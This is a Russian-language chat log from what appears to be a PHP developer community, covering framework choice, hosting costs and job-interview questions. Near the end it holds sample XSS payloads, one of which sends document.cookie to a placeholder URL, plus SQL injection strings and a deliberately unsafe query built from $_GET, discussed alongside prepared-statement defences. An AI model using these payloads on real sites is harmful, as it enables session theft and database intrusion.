Все может быть ;)

Я думал это госконтора какая-то

нет, не энтерпрайз

это мой паренек рассказывал из команды, он на аутсорсе был раньше

так там 500 или 500к

и обратные истории тоже знаю, когда люди заказывали у индусов решения за 500 долларов, и они работали

$500, сорри

тогда на самом деле заказчик был в чем-то прав, а ошибка в том, что вовремя не определили проблему и не переписали... ну и к тому же, друпал в общем не так плох по запросам, так что не факт, что yii дал адский прирост

не тысяч, просто 500 долларов

@miksir друпал именно что адски плох по базе

а могло быть наоборот, ноль посещаймости и 4к в трубу... и делал бы он дольше, наверняка

ну не знаю... по сравнению с битриком... ;)

там нормально делать по 10 тысяч запросов на отрисовку страницы

безусловно, могло быть и наоборот - деньги на ветер, это вопрос другого плана

опять же, я делал стартап где менеджеры сказали проектное 100к (условно)... вон до сих пор стопка серверов, оптические свитчи и корзины валяются... никому не нужные ;)

для этого придумали облака, MVP и микросервисы

тогда еще не особо.... лет 12 назад было

а потом, облака на больших объемах дороже своего оборудования

из облака можно выйти на свое железо

если не привязываться к специфике облака

Можно, так и код можно написать на друпале и переписать потом... ну условно. Тут скорее вопрос в вере в адекватность менеджмента, который 100к вещает

и наличии собственного специалиста, способного быстро ставить костыли, пока переписывается, переезжает и т.п. ;)

а купишь облако, проект взлетит, придет от облака счет на 100500, и опять ты виноват, что сразу не закупил свое железо, хотя менеджеры тебе говорили - 100к будет ;)

но в общем это, конечно, граничные случаи, не так и и много... так что теория, скорее...

Критерии недопроектирования очень простые. Справляется ли система с поставленной целью? Вот менеджер говорит мне: код на backend в целом, норм. Я спрашиваю: у нас какая целевая производительность? 100 тысяч одновременных online пользователей. Мы падаем на скольки? На 2 тысячах. На основании чего ты считаешь код бекенда нормальным? вопрос закрыт

качества кода != выдерживание нагрузки кодом качество кода это про стоимость изменений, простоту поддержки, % покрытия тестами наконец

Дургой пример. Сотрудник рассказывает: был у него заказчик, которому он предлагал написать систему на yii за $4k, а заказачик выбрал реализацию на Drupal за $500k. Посещаемость выросла, они перешли к специализированному облачному хостингу для друпала, и платят порядка $2k в месяц за такие нагрузки, которые сайт на фреймворке потянет на одном сервере. Сэкономили на -10 тысяч долларов за год.

если сайт приносит > 2к в месяц - то значит бизнес в плюсе, не вижу проблемы платить много за хостинг

а купишь облако, проект взлетит, придет от облака счет на 100500, и опять ты виноват, что сразу не закупил свое железо, хотя менеджеры тебе говорили - 100к будет ;)

если проект взлетел - то нужно думать о конверсии. если стоимость обслуживания пользователя отрицательная - то это видно и без нагрузки на "облако"

а проектирование - это не только про качество кода

а конверсия - она вообще к IT отношения не имеет... если проект приносит кучу - это не значит, что можно платить сколько угодно за то, за что можно платить меньше

короче мы про комплексный подход к разработке разными словами...

Ребят, никогда не работал с фреймворками php( какой посоветует начать осваивать ?

Именно для Объектно ориентировочного подхода и с максимальной производительностью

Ориентировочно symfony3, yii2, laravel5

Ориентировочно symfony3, yii2, laravel5

Мне стыдно, но я к Symfony3 пришел со второй попытки с разницой в два года.

Ну и норм, чо

Мне тоже с трудом давалось

Я к тому - чо стартовать с нее не сложно будет,

?

Ну человек же хочет ооп, а сф3 это самая ооп из ооп фреймворка

Оопшнее толко zf, но он не нужен

ну здесь согласен

Спасибо

Ребят, никогда не работал с фреймворками php( какой посоветует начать осваивать ?

я бы посоветовал осваивать концепции и архитектуру построения современного фреймворка, для этого лучше всего подойдет какой нить из микрофреймворков. silex и lumen имхо сложноваты внутри. как насчёт slim framework? потом я бы осваивал в таком порядке: slim -> silex/lumen -> yii2/laravel -> symfony

А есл сразу начать осваивать yii2?

ну если ты знаешь нормально пхп, что такое ооп (лол), есть хотя бы немного понимания как лучше делать и как не стоит, то почему бы и нет?)

А есл сразу начать осваивать yii2?

тогда ядро yii будет представлять из себя черный ящик, а цикл прохождения запроса не ясен

ну если ты знаешь нормально пхп, что такое ооп (лол), есть хотя бы немного понимания как лучше делать и как не стоит, то почему бы и нет?)

каждое собеседование удивляюсь как все знают пхп, до ооп редко доходим...

каждое собеседование удивляюсь как все знают пхп, до ооп редко доходим...

м? в смысле

м? в смысле

в прямом. собеседуемые путают клиент и сервер, типы данных, не могут в строгое сравнение, не могут рассказать про магические методы и тд

каждое собеседование удивляюсь как все знают пхп, до ооп редко доходим...

А можно онлайн пройти собеседование у вас? Я правда устраиваться не хочу, но собеседования - всегда отличный инструмент, чтобы узнать о своих слабых местах

в прямом. собеседуемые путают клиент и сервер, типы данных, не могут в строгое сравнение, не могут рассказать про магические методы и тд

удаленки нету у вас?))

?

А можно онлайн пройти собеседование у вас? Я правда устраиваться не хочу, но собеседования - всегда отличный инструмент, чтобы узнать о своих слабых местах

нет, я не готов тратить час времени на это.

удаленки нету у вас?))

только офис, только хардкор

нет, я не готов тратить час времени на это.

Ок, спасибо

А можно онлайн пройти собеседование у вас? Я правда устраиваться не хочу, но собеседования - всегда отличный инструмент, чтобы узнать о своих слабых местах

приведите примеры sql injection и xss уязвимостей к примеру

ну вот что за детские вопросы)

ну вот что за детские вопросы)

это я уже слышал, а потом собеседуемый начинает злиться что не может ни рассказать ни написать пример

я правда на другом мы проебался) там тестирование и прочая фигня)

тестирование чего?

xss в инпуте "><script>alert();</script> `"><script>document.write("<img src='path?cookie=" + document.cookie + ">")</script> "><iframe src=...>

тестирование чего?

ну я ни разу не писал тесты. то сть codeception/phpunit мимо) selenium тоже не трогал)

SQL-инъекции из серии: ?id=1+UNION+SELECT+1,1,1,1+FROM+users

Ну или в инпуте с паролем: password OR 1=1

ну я ни разу не писал тесты. то сть codeception/phpunit мимо) selenium тоже не трогал)

только из-за не знания как написать тесты - редко не берут

не, я к тому что я не выебываюсь и сам много не знаю)

Ну или в инпуте с паролем: password OR 1=1

а почему так происходит, как этого избежать?

а почему так происходит, как этого избежать?

Отсутствие проверки приходящих данных от клиента. Фильтровать данные

а почему так происходит, как этого избежать?

не делать так $sql = 'seelct * from user where name = ' . $_GET['name'] ну и дальше с паролем)

?

а как проверять данные?

кстати такое я реально видел)

не делать так $sql = 'seelct * from user where name = ' . $_GET['name'] ну и дальше с паролем)

А я раньше так делал, например )

а как проверять данные?

Например, filter_var. использовать PDO для работы с БД.

я ожидал услышать слова "экранирование, плейсхолдеры" для sql

и кстати раз мы это затронули. если использовать пдо и сделать запрос вида $sql = '.... where id = :id'; $sth = $pdo->prepare($sql) $sth->bindParam(':id', $_GET['id'], PDO::PARAM_INT); считается ли это безопасным?)

Кстати, наверное, к XSS еще относится и следующая ошибка (а может и нет): когда мы редактируем профиль и в нем есть скрытое поле - user_id. И при сохранении мы обновляем данные этого пользователя просто по указанному в форме user_id. Здесь как вариант - либо вообще не указывать и брать данные из сессии/куки (но так как куки можно подделать), использовать csrf / подпись. то есть генерировать еще один элемент token, например. И хешировать его с нужным нам значением

просто я изъянов не вижу, один фиг в запрос инт упадет)

но я хз)

я ожидал услышать слова "экранирование, плейсхолдеры" для sql

Понял, спасибо.

и кстати раз мы это затронули. если использовать пдо и сделать запрос вида $sql = '.... where id = :id'; $sth = $pdo->prepare($sql) $sth->bindParam(':id', $_GET['id'], PDO::PARAM_INT); считается ли это безопасным?)

а почему нет? ;)

ну вот и решили)

а у меня другой вопрос по этим биндам ) Чем отличается bindParam от bindValue ?

Связывает PHP переменную с именованным или неименованным параметром подготавливаемого SQL запроса. В отличие от PDOStatement::bindValue(), переменная привязывается по ссылке, и ее значение будет вычисляться во время вызова PDOStatement::execute().

RTFM

сигнатуры методов разные

RTFM

Вопрос в другом - вот ты знал это?) Просто я несколько лет назад столкнулся с этим и долго не мог понять почему не происходит нужного действия, пока не открыл FM :)

не знал) я загугил

?

Ну просто когда мне рассказывали про PDO на собеседованиях (которые я проводил) - я задавал этот вопрос. И никто еще правильно не ответил, все говорили что это функции-синонимы.

Да и говорю же, сам не знал - пока не столкнулся.

ну спасибо тебе, я теперь знаю хоть и не сталкивался с этим)

Пожалуйста )

Да и говорю же, сам не знал - пока не столкнулся.

в php так во многом, поэтому приходится задавать "детские вопросы" чтобы понять понимание человека вообще области, а потом уже если требуется - можно углубляться в конкретику. причем многое из конкретики легко даже сеньор может не помнить. сеньоров вообще сложнее собеседовать чем джунов, они уже мало сам пхп помнят